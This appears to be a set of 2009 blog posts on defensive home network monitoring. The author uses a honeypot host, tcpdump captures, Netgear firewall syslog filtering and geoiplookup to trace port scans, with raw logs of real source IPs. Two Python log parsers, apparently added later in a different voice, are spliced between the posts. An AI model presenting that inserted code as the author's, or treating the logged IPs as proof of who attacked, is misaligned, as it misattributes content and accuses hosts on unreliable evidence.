06:36:17.744371 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]
06:36:18.500456 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]
07:20:05.328165 8.63.191.61.broad.static.hf.ah.cndata.com.6000 > 192.168.0.12.2967: S 1176764416:1176764416(0) win 16384 [tos 0x20]

....

After some awkward awk statements, we have the SIP list ready for processing by geoiplookup against the GeoLiteCity database:

tcpdump -r out.txt | awk -F">" '{print $1}' | awk -F" " '{print $2}' | awk -F"." '{print $1"."$2"."$3"."$4}' >> out_IP.txt 
for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i -f /usr/local/share/GeoIP/GeoLiteCity.dat`; done 

218.7.164.30 : GeoIP City Edition, Rev 1: CN, 08, Suihua, (null), 46.640598, 126.996902, 0, 0
202.99.11.99 : GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0
catv-86-101-50-119.catv.broadband.hu : GeoIP City Edition, Rev 1: HU, 23, Veszprém, (null), 47.099998, 17.916700, 0, 0
192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found
192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found
10.13.3.61 : GeoIP City Edition, Rev 1: IP Address not found
117.0.33.129 : GeoIP City Edition, Rev 1: VN, 44, Hanoi, (null), 21.033300, 105.849998, 0, 0
dynamic.91.192.169 : GeoIP City Edition, Rev 1: can't resolve hostname ( dynamic.91.192.169 )
c-98-242-240-55.hsd1.fl.comcast : GeoIP City Edition, Rev 1: can't resolve hostname ( c-98-242-240-55.hsd1.fl.comcast )
....

But let us suppose we want to track only connections from the United States:

for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i` | grep 'United States'; done   

75-165-69-40.tukw.qwest.net : GeoIP Country Edition: US, United States
128.55.237.114 : GeoIP Country Edition: US, United States
128.55.237.114 : GeoIP Country Edition: US, United States
8.63.191.61 : GeoIP Country Edition: US, United States
173.1.171.82 : GeoIP Country Edition: US, United States
12.4.209.243 : GeoIP Country Edition: US, United States
208-110-155-97.customer.csolutions.net : GeoIP Country Edition: US, United States

Traceroutes to particular IPs are notoriously useless, as the unanswered hops below show:

# traceroute  8.63.191.61
traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  1.179 ms  1.153 ms  1.143 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.692 ms  9.661 ms  9.477 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.541 ms  11.897 ms  10.621 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.404 ms  13.245 ms  13.285 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.652 ms  12.481 ms  13.850 ms
 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  15.77 ms  13.320 ms  13.734 ms
 8  * * *
 9  * * *
10  * * *
11  * * *
^C
# traceroute  -P ICMP 8.63.191.61
traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  0.460 ms  0.328 ms  0.289 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  12.610 ms  8.716 ms  8.629 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.434 ms  8.360 ms  13.671 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.748 ms  11.914 ms  11.173 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  19.632 ms  13.667 ms  12.556 ms
 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  14.819 ms  13.441 ms  13.465 ms
 8  * * *
 9  * * *
10  * *

So now we have spent quite a bit of time extracting data for just one day's worth of activity. Obviously what is needed is a more comprehensive approach: real-time alerting, database, web-based information, long-term analysis and mapping.  This is what you buy with your Intrusion Prevention System...

Friday, May 8, 2009

Where are the SIPs from?

The geoiplookup utility is very helpful in assessing the country where the SIPs (Source Internet Protocol Addresses) are from. We might be able to say 'hackers' instead of SIPs if it were ultimately possible to deduce from a SIP the originators of an attack on any given firewall. And that is important to remember: IPs can be spoofed, the country of origin tells you nothing about the operators themselves, and criminals and nation-state actors can lease hosts anywhere. So withhold judgement based on IP!

However, if I log tcpdump output to a file with something like this:

/usr/local/sbin/tcpdump -s 0 -i xl0 -n -tt 'port not(ssh or domain or whois or http or https or syslog or ntp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

My dummy/honeypot host receives about 100 or so entries per day from foreign IPs that look like this:

1241804920.098123 IP 85.249.160.55.1225 > 192.168.0.12.38507: UDP, length 20
1241805774.527866 IP 201.67.52.249.59649 > 192.168.0.12.12712: UDP, length 21
1241806316.686063 IP 218.6.12.230.6000 > 192.168.0.12.2967: Flags [S], seq 114163712, win 16384, length 0
1241806357.627835 IP 61.153.26.60.1517 > 192.168.0.12.1434: UDP, length 376
1241807555.257870 IP 91.150.223.226.1519 > 192.168.0.12.38507: UDP, length 63
1241813077.431641 IP 98.247.212.4.1980 > 192.168.0.12.23: Flags [SEW], seq 1693462630, win 5840, options [mss 1460,sackOK,TS val 117815450 ecr 0,nop,wscale 0], length 0
...

The syslog entries that my Netgear FVS318 firewall is forwarding to my OpenBSD dummy/honeypot host contain similar attacks but many more legitimate connection attempts like this:

May  9 09:06:45 192.168.0.1 rferris Blocked Sites Log[46161]:portforward forwarded , SIP:216.35.67.135: 80, DIP:98.247.182.78: 19899, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46166]:portforward forwarded , SIP:68.87.69.146: 53, DIP:98.247.182.78: 17337, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46169]:portforward forwarded , SIP:76.96.30.119: 110, DIP:98.247.182.78: 17681,

I can get a good approximation of which SIPs' connection attempts cannot simply be counted as part of possibly normal connectivity by subtracting (as in the tcpdump filters above) the entries whose SIP ports are mail, whois, dns, http, ntp, etc.:

grep -f file1 syslog | grep -v -f file2 | awk -F":" '{print $5}' | sort | uniq >> out.txt

where file1 is:
Hacker
Blocked

and file2 is:
25,
43,
53,
80,
110,
123,
587,

As the astute reader will point out, this technique completely neglects hacking attacks from legitimate ports! Also, much legitimate traffic comes over port 443 (ssl), which I have excluded here. (Of course, that is what an IDS is for... much more on that later...) The next step in my investigation is to look up the country of origin for each IP. Batching whois queries is frowned upon; geoiplookup fills this need:

for i in `cat out.txt`; do echo $i:`geoiplookup $i`;done;          

10.13.3.61:GeoIP Country Edition: IP Address not found
113.56.251.166:GeoIP Country Edition: CN, China
115.132.83.188:GeoIP Country Edition: MY, Malaysia
116.3.98.197:GeoIP Country Edition: CN, China
116.54.196.108:GeoIP Country Edition: CN, China
117.127.93.18:GeoIP Country Edition: CN, China
118.100.85.190:GeoIP Country Edition: MY, Malaysia
118.22.208.254:GeoIP Country Edition: JP, Japan
....
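The awk extraction in Part II above and the grep -f file1 / grep -v -f file2 filter here both pull SIPs out of text by field position, which breaks on multi-label hostnames and on ports that happen to be substrings of other ports. As an added example (my own code, not the author's pipeline), this Python parser handles the three line formats on this page, keeps the private-address check that explains the "IP Address not found" entries, and drops service-port replies by exact port comparison; the port set is taken from file2, and the sample line with SIP 203.0.113.7 is constructed.

```python
"""Extract source IPs (SIPs) from the tcpdump and Netgear FVS318 syslog
lines shown in these posts, avoiding the awk and grep pitfalls."""
import ipaddress
import re
from collections import Counter

# Source ports that file2 above treats as replies from ordinary services
# (smtp, whois, dns, http, pop3, ntp, submission).
SERVICE_SRC_PORTS = {25, 43, 53, 80, 110, 123, 587}

# tcpdump, both the 3.x style ("21:07:30.303358 host.port > host.port: ...")
# and the 4.0 "-n -tt" style ("1241804920.098123 IP a.b.c.d.port > ...").
# The greedy \S+ before the last dot keeps multi-label hostnames whole,
# which awk -F"." '{print $1"."$2"."$3"."$4}' does not.
TCPDUMP_RE = re.compile(
    r"^\S+\s+(?:IP\s+)?(?P<src>\S+)\.(?P<sport>[^.\s]+)\s+>\s+"
    r"(?P<dst>\S+)\.(?P<dport>[^.\s:]+):")
# Netgear syslog: "... SIP:216.35.67.135: 80, DIP:98.247.182.78: 19899,"
NETGEAR_RE = re.compile(
    r"SIP:(?P<src>[\d.]+):\s*(?P<sport>\d+),\s*"
    r"DIP:(?P<dst>[\d.]+):\s*(?P<dport>\d+),")


def _port(text):
    """Without -n tcpdump prints service names (ms-sql-m); keep those."""
    return int(text) if text.isdigit() else text


def parse_line(line):
    """Return {'src', 'sport', 'dst', 'dport'} or None for other lines."""
    m = NETGEAR_RE.search(line) or TCPDUMP_RE.match(line)
    if not m:
        return None
    return {"src": m["src"], "sport": _port(m["sport"]),
            "dst": m["dst"], "dport": _port(m["dport"])}


def classify_source(host):
    """'private' for RFC1918 and other non-routable literals (spoofed or
    router leakage), 'public' for other IPs, 'hostname' when tcpdump ran
    without -n and geoiplookup would have to resolve the name first."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    return "private" if addr.is_private else "public"


def suspicious_sources(lines):
    """Count (SIP, destination port) pairs, dropping service-port replies.
    Ports are compared as integers: grep -v -f file2 with the pattern
    '80,' would also discard a line whose DIP port is 19880."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["sport"] in SERVICE_SRC_PORTS:
            continue
        hits[(rec["src"], rec["dport"])] += 1
    return hits


def unique_sips(lines):
    """Distinct SIPs, sorted, ready for a geoiplookup loop."""
    return sorted({src for src, _ in suspicious_sources(lines)})


# Sample input: lines copied from the posts above plus one constructed
# Netgear line (SIP 203.0.113.7, DIP port 19880) for the substring trap.
SAMPLE_LINES = [
    "21:07:30.303358 218.7.164.30.6000 > 192.168.0.12.ms-sql-s: S 69599232:69599232(0) win 16384 [tos 0x20]",
    "22:20:11.329910 catv-86-101-50-119.catv.broadband.hu.1077 > 192.168.0.12.38507: udp 28 [tos 0x20]",
    "23:01:48.360917 10.13.3.61.1092 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]",
    "1241806357.627835 IP 61.153.26.60.1517 > 192.168.0.12.1434: UDP, length 376",
    "May  9 09:06:45 192.168.0.1 rferris Blocked Sites Log[46161]:portforward forwarded , SIP:216.35.67.135: 80, DIP:98.247.182.78: 19899, ",
    "May  5 09:05:59 192.168.0.1 rferris Hacker Log[64533]:PROTO_TCP, SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data",
    "May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[99999]:portforward forwarded , SIP:203.0.113.7: 4444, DIP:98.247.182.78: 19880, ",
    "tcpdump: WARNING: snaplen raised from 96 to 65535",
]

if __name__ == "__main__":
    for (src, dport), n in suspicious_sources(SAMPLE_LINES).most_common():
        print(f"{n:3d}  {src:<40} -> {dport}  [{classify_source(src)}]")
```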

Hacking is an international activity. It is nice to be silently stalked by so many foreign countries!

for i in `cat out.txt`; do geoiplookup $i >> geoiplookup.txt ;done;
cat geoiplookup.txt | sort | uniq -c | sort -rn

  55 GeoIP Country Edition: CN, China
  20 GeoIP Country Edition: US, United States
  10 GeoIP Country Edition: RU, Russian Federation
  10 GeoIP Country Edition: BR, Brazil
   8 GeoIP Country Edition: UA, Ukraine
   5 GeoIP Country Edition: VN, Vietnam
   4 GeoIP Country Edition: MY, Malaysia
   4 GeoIP Country Edition: KR, Korea, Republic of
   4 GeoIP Country Edition: IT, Italy
   3 GeoIP Country Edition: FR, France
   2 GeoIP Country Edition: TR, Turkey
   2 GeoIP Country Edition: JP, Japan
   2 GeoIP Country Edition: GB, United Kingdom
   2 GeoIP Country Edition: DE, Germany
   2 GeoIP Country Edition: CA, Canada
   1 GeoIP Country Edition: ZA, South Africa
   1 GeoIP Country Edition: VE, Venezuela
   1 GeoIP Country Edition: UY, Uruguay
   1 GeoIP Country Edition: TW, Taiwan
   1 GeoIP Country Edition: TH, Thailand
   1 GeoIP Country Edition: SI, Slovenia
   1 GeoIP Country Edition: SE, Sweden
   1 GeoIP Country Edition: QA, Qatar
   1 GeoIP Country Edition: PL, Poland
   1 GeoIP Country Edition: PH, Philippines
   1 GeoIP Country Edition: PA, Panama
   1 GeoIP Country Edition: NZ, New Zealand
   1 GeoIP Country Edition: NO, Norway
   1 GeoIP Country Edition: MX, Mexico
   1 GeoIP Country Edition: MD, Moldova, Republic of
   1 GeoIP Country Edition: JM, Jamaica
   1 GeoIP Country Edition: IP Address not found
   1 GeoIP Country Edition: IN, India
   1 GeoIP Country Edition: HK, Hong Kong
   1 GeoIP Country Edition: FI, Finland
   1 GeoIP Country Edition: EG, Egypt
   1 GeoIP Country Edition: CO, Colombia

What of "IP Address not found"!? (Another question to resolve...) However, let us suppose we are just interested in the U.S. connections. Keep in mind that some of these are legitimate ssl (443) connections.

# for i in `cat out.txt`; do echo $i:` geoiplookup $i` | grep "United States";done; 

152.26.20.72:GeoIP Country Edition: US, United States
168.75.65.98:GeoIP Country Edition: US, United States
173.1.171.82:GeoIP Country Edition: US, United States
173.69.171.116:GeoIP Country Edition: US, United States
173.8.113.195:GeoIP Country Edition: US, United States
205.214.57.202:GeoIP Country Edition: US, United States
208.111.159.155:GeoIP Country Edition: US, United States
209.85.201.125:GeoIP Country Edition: US, United States
63.226.235.106:GeoIP Country Edition: US, United States
63.231.190.174:GeoIP Country Edition: US, United States
64.251.8.230:GeoIP Country Edition: US, United States
66.35.46.195:GeoIP Country Edition: US, United States
68.142.94.151:GeoIP Country Edition: US, United States
68.37.225.206:GeoIP Country Edition: US, United States
72.42.151.135:GeoIP Country Edition: US, United States
74.63.193.230:GeoIP Country Edition: US, United States
98.220.41.92:GeoIP Country Edition: US, United States
98.247.182.78:GeoIP Country Edition: US, United States
98.247.212.4:GeoIP Country Edition: US, United States
99.152.215.137:GeoIP Country Edition: US, United States

It is useful to see how much information can be gained without packet inspection. Next up: tracking SIPs to their networks...


Wednesday, May 6, 2009

Port 6000 Scans

I receive lots of port 6000 scans on my Netgear FVS318 firewall. My guess is many of you do as well. By changing the firewall to forward all the ports to an OpenBSD "dummy/honeypot" host, I am able to sniff the packets that come into my WAN (without a tap), thus increasing my information about and control over them vs. firewall syslog output. X11 can be configured with its default remote port on 6000. My guess is I receive two dozen plus IPs attempting to connect with this port per week:

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on xl0, link-type EN10MB (Ethernet), capture size 65535 bytes
...
1241648685.844326 IP 218.58.220.130.6000 > 192.168.0.12.2967: Flags [S], seq 1519714304, win 16384, length 0
1241649491.716071 IP 80.13.217.205.6000 > 192.168.0.12.2967: Flags [S], seq 1519714304, win 16384, options [mss 1460], length 0
....
1241653701.125407 IP 221.195.73.68.6000 > 192.168.0.12.7212: Flags [S], seq 1454440448, win 16384, length 0
1241653701.128528 IP 221.195.73.68.6000 > 192.168.0.12.8000: Flags [S], seq 798031872, win 16384, length 0
1241656783.765870 IP 119.161.130.75.6000 > 192.168.0.12.2967: Flags [S], seq 640548864, win 16384, length 0
....

/var/log# grep 119.161.130.75  syslog
[Under FVS318 normal operation]:

May  4 10:45:13 192.168.0.1 rferris [59299]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  4 12:43:54 192.168.0.1 rferris [59342]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  4 17:36:29 192.168.0.1 rferris [59440]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  4 22:28:39 192.168.0.1 rferris [59534]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  5 03:52:54 192.168.0.1 rferris [62240]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  5 09:05:59 192.168.0.1 rferris [64532]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  5 09:05:59 192.168.0.1 rferris Hacker Log[64533]:PROTO_TCP, SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data
May  5 14:36:22 192.168.0.1 rferris [64635]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  5 19:34:38 192.168.0.1 rferris [64831]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  6 00:34:49 192.168.0.1 rferris [70599]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  6 05:22:39 192.168.0.1 rferris [73607]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  6 10:11:50 192.168.0.1 rferris [76793]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  6 14:11:41 192.168.0.1 rferris [76868]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

[With dummy/honeypot host] the FVS318 logs this:
May  6 20:15:15 192.168.0.1 rferris [216]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  6 20:15:15 192.168.0.1 rferris Blocked Sites Log[217]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 
May  7 01:04:14 192.168.0.1 rferris [5964]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  7 01:04:14 192.168.0.1 rferris Blocked Sites Log[5965]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 
May  7 05:57:33 192.168.0.1 rferris [10106]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  7 05:57:33 192.168.0.1 rferris Blocked Sites Log[10107]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 

The Dummy Host....

Another option besides taps or hubs for sniffing traffic from your WAN port is to set up your firewall to port forward all traffic (ports 1 - 65535) to a 'dummy' or 'honeypot' box on your network running no insecure services. (OpenBSD with a fully commented out inetd.conf file is a good choice for this...maybe with pfsense running:-)  Tcpdump 4.0 can then catch the traffic that the firewall's syslog output (logs forwarded to syslogd) missed. You will want to filter out quite a bit of traffic. Below you can see the BSD host answering connection attempts to closed ports with length 0 RST packets (Flags [R.]). I would like to know what all the port 6000 requests are about.
 
/usr/local/sbin/tcpdump -s 0 -i dc0 -n host [dummy/honeynet host IP] and 'port not(65533 or domain or whois or http or https or ntp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)'

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on dc0, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 98.247.182.78.18495 > 192.168.0.6.6000: Flags [S], seq 363174240, win 5840, options [mss 1460,sackOK,TS val 2475642 ecr 0,nop,wscale 5], length 0
IP 192.168.0.6.6000 > 98.247.182.78.18495: Flags [R.], seq 0, ack 363174241, win 0, length 0
IP 211.99.122.18.1870 > 192.168.0.6.1434: UDP, length 376
IP 217.116.58.35.4073 > 192.168.0.6.23: Flags [S], seq 2731026689, win 5840, options [mss 1460,sackOK,TS val 63933632 ecr 0,nop,wscale 0], length 0
IP 192.168.0.6.23 > 217.116.58.35.4073: Flags [R.], seq 0, ack 2731026690, win 0, length 0
IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, options [mss 1452,nop,nop,sackOK], length 0
IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 474425301, win 0, length 0
IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, options [mss 1452,nop,nop,sackOK], length 0
IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 1, win 0, length 0
IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, options [mss 1452,nop,nop,sackOK], length 0
IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 1, win 0, length 0

The syslog command to compare this output with is:

tail  -n 10000 -f syslog | grep -i -f file1 | grep -v -f file2

Where file1 is:
Hacker
Blocked

Where file2 is :
25,
53,
80,
43,
587,
110,

Normally, the Netgear FVS318 gives us "Hacker Log" when its signature detection catches an abnormal packet:

May  6 10:11:31 192.168.0.1 rferris Hacker Log[76792]:PROTO_TCP, SIP:85.99.72.200: 4784, DIP:98.247.182.78: 23, Telnet
May  6 12:08:20 192.168.0.1 rferris Hacker Log[76826]:PROTO_TCP, SIP:99.152.215.137: 2766, DIP:98.247.182.78: 18448, Suspicious TCP Data
May  6 12:35:03 192.168.0.1 rferris Hacker Log[76832]:PROTO_TCP, SIP:118.100.85.190: 4323, DIP:98.247.182.78: 6429, Suspicious TCP Data
May  6 13:34:12 192.168.0.1 rferris Hacker Log[76849]:PROTO_UDP, SIP:87.17.219.154: 1615, DIP:98.247.182.78: 12712, Suspicious UDP Data
May  6 13:55:10 192.168.0.1 rferris Hacker Log[76859]:PROTO_TCP, SIP:222.150.209.191: 3640, DIP:98.247.182.78: 5554, Suspicious TCP Data
May  6 14:13:50 192.168.0.1 rferris Hacker Log[76870]:PROTO_TCP, SIP:64.251.8.230: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data
May  6 16:28:56 192.168.0.1 rferris Hacker Log[76905]:PROTO_TCP, SIP:83.23.92.208: 2136, DIP:98.247.182.78: 23, Telnet
May  6 16:35:45 192.168.0.1 rferris Hacker Log[76907]:PROTO_UDP, SIP:220.180.133.13: 19672, DIP:98.247.182.78: 1434, Suspicious UDP Data
May  6 17:02:14 192.168.0.1 rferris Hacker Log[76916]:PROTO_UDP, SIP:89.169.90.18: 1685, DIP:98.247.182.78: 12712, Suspicious UDP Data
May  6 17:16:17 192.168.0.1 rferris Hacker Log[76922]:PROTO_TCP, SIP:125.113.14.183: 1810, DIP:98.247.182.78: 6429, Suspicious TCP Data
May  6 18:13:17 192.168.0.1 rferris Hacker Log[76938]:PROTO_UDP, SIP:118.22.208.254: 1134, DIP:98.247.182.78: 38507, Suspicious UDP Data
May  6 19:21:08 192.168.0.1 rferris Hacker Log[78279]:PROTO_UDP, SIP:117.127.93.18: 1377, DIP:98.247.182.78: 12712, Suspicious UDP Data
May  6 19:23:21 192.168.0.1 rferris Hacker Log[78289]:PROTO_UDP, SIP:119.203.56.20: 1084, DIP:98.247.182.78: 38507, Suspicious UDP Data

However, if you configure all ports to forward to your "dummy/honeypot" server, you trigger the Blocked Sites log for all activity. Here we have subtracted the functioning ports (25, 53, 80, 110, 43, 587) that the firewall normally NATs out... Of course, that is another story....

May  6 19:39:10 192.168.0.1 rferris Blocked Sites Log[9]:portforward forwarded , SIP:12.151.34.170: 123, DIP:98.247.182.78: 16896, 
May  6 19:39:59 192.168.0.1 rferris Blocked Sites Log[16]:portforward forwarded , SIP:209.85.201.125: 5223, DIP:98.247.182.78: 17919, 
May  6 20:00:28 192.168.0.1 rferris Blocked Sites Log[130]:portforward forwarded , SIP:60.18.161.7: 6000, DIP:98.247.182.78: 1433, 
May  6 20:15:15 192.168.0.1 rferris Blocked Sites Log[217]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 
May  6 20:26:48 192.168.0.1 rferris Blocked Sites Log[250]:portforward forwarded , SIP:221.195.73.68: 6000, DIP:98.247.182.78: 7212, 
May  6 20:44:57 192.168.0.1 rferris Blocked Sites Log[326]:portforward forwarded , SIP:221.208.253.254: 6000, DIP:98.247.182.78: 2967, 
May  6 21:14:25 192.168.0.1 rferris Blocked Sites Log[653]:portforward forwarded , SIP:98.247.182.78: 113, DIP:98.247.182.78: 18932, 
May  6 21:14:28 192.168.0.1 rferris Blocked Sites Log[940]:portforward forwarded , SIP:98.247.182.78: 37, DIP:98.247.182.78: 18649, 
May  6 21:16:22 192.168.0.1 rferris Blocked Sites Log[3017]:portforward forwarded , SIP:98.247.182.78: 13, DIP:98.247.182.78: 18487, 
May  6 21:16:39 192.168.0.1 rferris Blocked Sites Log[3019]:portforward forwarded , SIP:98.247.182.78: 113, DIP:98.247.182.78: 18488, 
May  6 21:35:43 192.168.0.1 rferris Blocked Sites Log[3115]:portforward forwarded , SIP:211.99.122.18: 1870, DIP:98.247.182.78: 1434, 
May  6 21:36:41 192.168.0.1 rferris Blocked Sites Log[3117]:portforward forwarded , SIP:217.116.58.35: 4073, DIP:98.247.182.78: 23, 
May  6 21:39:19 192.168.0.1 rferris Blocked Sites Log[3126]:portforward forwarded , SIP:12.151.34.170: 123, DIP:98.247.182.78: 16896, 
May  6 22:05:18 192.168.0.1 rferris Blocked Sites Log[3258]:portforward forwarded , SIP:79.21.157.80: 2166, DIP:98.247.182.78: 6429, 
May  6 22:07:11 192.168.0.1 rferris Blocked Sites Log[3266]:portforward forwarded , SIP:218.75.95.242: 6000, DIP:98.247.182.78: 2967, 
May  6 22:14:26 192.168.0.1 rferris Blocked Sites Log[3636]:portforward forwarded , SIP:66.35.46.195: 10683, DIP:98.247.182.78: 33436, 
May  6 22:20:22 192.168.0.1 rferris Blocked Sites Log[4019]:portforward forwarded , SIP:66.35.46.195: 11923, DIP:98.247.182.78: 33436, 
May  6 22:29:20 192.168.0.1 rferris Blocked Sites Log[4302]:portforward forwarded , SIP:66.35.46.195: 11888, DIP:98.247.182.78: 33436, 
May  6 23:01:35 192.168.0.1 rferris Blocked Sites Log[4470]:portforward forwarded , SIP:202.99.11.99: 1231, DIP:98.247.182.78: 1434, 
May  6 23:03:49 192.168.0.1 rferris Blocked Sites Log[4514]:portforward forwarded , SIP:217.128.72.145: 1393, DIP:98.247.182.78: 38507, 
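As an added example (not code from the original post), here is the file1/file2 grep pipeline above expressed as a small parser for the FVS318 "Hacker Log" and "Blocked Sites Log" lines: it groups flagged events by source IP, drops replies from the NAT'd service ports that file2 strips, and pulls out the sources probing from port 6000. The sample lines are constructed in the formats shown above; NAT_PORTS mirrors file2.

```python
import re
from collections import defaultdict

# Constructed sample lines in the three FVS318 syslog formats shown in this post.
SAMPLE_SYSLOG = """\
May  6 10:11:50 192.168.0.1 rferris [76793]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75
May  6 14:13:50 192.168.0.1 rferris Hacker Log[76870]:PROTO_TCP, SIP:64.251.8.230: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data
May  6 16:35:45 192.168.0.1 rferris Hacker Log[76907]:PROTO_UDP, SIP:220.180.133.13: 19672, DIP:98.247.182.78: 1434, Suspicious UDP Data
May  6 20:26:48 192.168.0.1 rferris Blocked Sites Log[250]:portforward forwarded , SIP:221.195.73.68: 6000, DIP:98.247.182.78: 7212,
May  6 20:26:49 192.168.0.1 rferris Blocked Sites Log[251]:portforward forwarded , SIP:221.195.73.68: 6000, DIP:98.247.182.78: 8000,
May  6 21:30:00 192.168.0.1 rferris Blocked Sites Log[700]:portforward forwarded , SIP:209.85.201.125: 80, DIP:98.247.182.78: 17919,
"""

# file1 selects "Hacker Log" and "Blocked Sites Log" lines; only those carry both endpoints and ports.
FLAGGED = re.compile(
    r"(Hacker Log|Blocked Sites Log)\[\d+\]:.*?"
    r"SIP:([\d.]+): (\d+), DIP:([\d.]+): (\d+),\s*(.*)$")

# Source ports of services the firewall NATs out; file2 (25, 53, 80, 43, 587, 110) strips their replies.
NAT_PORTS = {25, 53, 80, 43, 587, 110}

def parse_flagged(line):
    """Return (log, sip, sport, dip, dport, note) or None for an unflagged line."""
    m = FLAGGED.search(line)
    if not m:
        return None
    log, sip, sport, dip, dport, note = m.groups()
    return log, sip, int(sport), dip, int(dport), note.strip()

def triage(syslog_text, nat_ports=NAT_PORTS):
    """Group flagged events by source IP, dropping replies from NAT'd services."""
    by_src = defaultdict(lambda: {"sports": set(), "dports": set(), "logs": set()})
    for line in syslog_text.splitlines():
        rec = parse_flagged(line)
        if rec is None:
            continue                      # plain TCP(port) lines: not in file1
        log, sip, sport, _dip, dport, _note = rec
        if sport in nat_ports:
            continue                      # the file2 exclusion
        by_src[sip]["sports"].add(sport)
        by_src[sip]["dports"].add(dport)
        by_src[sip]["logs"].add(log)
    return dict(by_src)

def port_6000_sources(by_src):
    """Sources probing from port 6000, with the destination ports they hit."""
    return {sip: sorted(v["dports"]) for sip, v in by_src.items()
            if 6000 in v["sports"]}
```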

Monday, May 4, 2009

Monitoring home networks with bare bones

Network monitoring and intrusion detection are done at many different levels now: individual computer, home networks, small networks, larger networks, ISP backbones. There are literally network taps, network prefilters, firewalls, contextual search engines, intrusion detection systems and analyzers for every budget and bandwidth. But still, ghostnets happen, even in supposedly secure locations. Simply put, current attack vectors outfox existing security installations! But without rehashing all the existing technologies, checking out your network at a raw level looks something like this:



Your primitive tools are Cygwin, tcpdump 4.0, Snort, NM 3.3, syslogd, the bash shell, pcregrep, a hub, an updated router/firewall, and X Windows running on one or more of Linux, OpenBSD, or Windows XP. Your assignment is to redirect the traffic coming to your external router to a "tap" (or, in this cheapest case, a hub) and monitor it for unwarranted traffic and attempted intrusions. If you have a reliable hardware firewall, it will output messages of your choosing to a correctly configured syslogd that accepts remote connections:

grep rferris syslog
May  5 01:49:04 192.168.0.1 rferris [61282]:TCP(19590)                 Dest IP :98.247.182.78,         Src IP  :85.13.200.108
May  5 01:49:04 192.168.0.1 rferris [61283]:HTTP(80)                 Dest IP :74.125.127.191,         Src IP  :192.168.0.8
May  5 01:49:04 192.168.0.1 rferris [61284]:TCP(19591)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191
May  5 01:50:21 192.168.0.1 rferris [61285]:TCP(19591)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191
